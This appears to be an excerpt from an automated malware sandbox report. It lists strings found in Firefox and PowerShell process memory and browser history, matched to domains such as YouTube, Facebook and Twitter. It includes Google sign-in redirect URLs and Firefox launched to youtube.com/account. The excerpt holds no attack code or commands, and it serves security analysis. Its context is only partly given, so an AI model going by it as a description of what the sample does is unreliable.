Source: firefox.exe, 00000010.00000003.3262808062.000001A8C3D9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122177082.000001A8B89B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: getZOrderAppWindowEnumerator@mozilla.org/supports-PRUint64;1-*- UpdateBrowserIDHelper: _shouldViewDownloadInternally/<validateFileNameForSavingbrowsing-context-discardedbrowser-delayed-startup-finished@mozilla.org/browser/clh;1toolkit.singletonWindowTypeVALIDATE_NO_DEFAULT_FILENAMEPREF_BRANCH_PREVIOUS_ACTIONpreviousHandler.preferredAction.https://www.youtube.com/accountgetCurrentInnerWindowWithIdbrowser-open-homepage-startVALIDATE_ALLOW_INVALID_FILENAMES_shouldViewDownloadInternallytoolkit.defaultChromeFeaturesget isVideoDecodingSuspended equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AcMMx-djIaRGV_oWtC_GcZw2kfAeE7zPLvpVpAemuw8UUzxDDeAm6H7o2uWjT74iA2PXKPXIZ87N8A equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AcMMx-djIaRGV_oWtC_GcZw2kfAeE7zPLvpVpAemuw8UUzxDDeAm6H7o2uWjT74iA2PXKPXIZ87N8AYouTube equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AcMMx-djIaRGV_oWtC_GcZw2kfAeE7zPLvpVpAemuw8UUzxDDeAm6H7o2uWjT74iA2PXKPXIZ87N8AYouTube/ equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GBYouTube equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GBYouTube/ equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AcMMx-f0Ki1dkMR8NUrH12cSsRPXXdvdv16fJwCXx6QqaRmryqWJMXp36Pxh8OCjHC3NFrZP06WloA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1308328676%3A1732418622661480&ddm=1 equals www.youtube.com (Youtube)
Source: Session_13376892216433120.17.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AcMMx-f0Ki1dkMR8NUrH12cSsRPXXdvdv16fJwCXx6QqaRmryqWJMXp36Pxh8OCjHC3NFrZP06WloA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1308328676%3A1732418622661480&ddm=1" equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AcMMx-f0Ki1dkMR8NUrH12cSsRPXXdvdv16fJwCXx6QqaRmryqWJMXp36Pxh8OCjHC3NFrZP06WloA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1308328676%3A1732418622661480&ddm=1YouTube equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3263352248.000001A8C37E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3330787150.000001A8B6F29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3255394267.000001A8B8DAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Get to a Wikipedia page fast, from anywhere on the web. Just highlight any webpage text and right-click to open the context menu to start a Wikipedia search. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Get to a Wikipedia page fast, from anywhere on the web. Just highlight any webpage text and right-click to open the context menu to start a Wikipedia search. equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Get to a Wikipedia page fast, from anywhere on the web. Just highlight any webpage text and right-click to open the context menu to start a Wikipedia search. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))New features include Inline Image Viewer, Never Ending Reddit (never click 'next page' again), Keyboard Navigation, Account Switcher, and User Tagger. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))New features include Inline Image Viewer, Never Ending Reddit (never click 'next page' again), Keyboard Navigation, Account Switcher, and User Tagger. equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))New features include Inline Image Viewer, Never Ending Reddit (never click 'next page' again), Keyboard Navigation, Account Switcher, and User Tagger. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3091318017.00000000086DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account 1PN equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3091318017.00000000086DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account NN equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://www.youtube.com/accountYouTube equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://www.youtube.com/accountYouTube/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountbound fixupAndLoadURIStringLOAD_FLAGS_ERROR_LOAD_CHANGES_RVbound _updateEnabledStateobserve/secondaryActions< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000B.00000003.2984314258.0000027D5D6DD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: n]8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3236983756.000001A8BFD4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: nmoz-nullprincipal:{a7578a0f-09bf-4e44-b413-18f89f298fa5}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3284374660.0000029D56100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: previousHandler.preferredAction.https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://search-extensions/google/*://*.adsafeprotected.com/jsvid?**://securepubads.g.doubleclick.net/gampad/*ad*resource://search-extensions/amazondotcom/--autocomplete-popup-separator-coloraddons-search-detection@mozilla.comresource://search-extensions/wikipedia/*://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://ads.stickyadstv.com/user-matching*app.update.background.enabled=false equals www.facebook.com (Facebook)
Source: firefox.exe, 0000000B.00000003.2984314258.0000027D5D6DD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3345132926.000001A8B7EE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3263352248.000001A8C37E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3238343935.000001A8C3789000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3111075375.000001A8B74FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3255394267.000001A8B8DAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com@ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8613000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B86B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
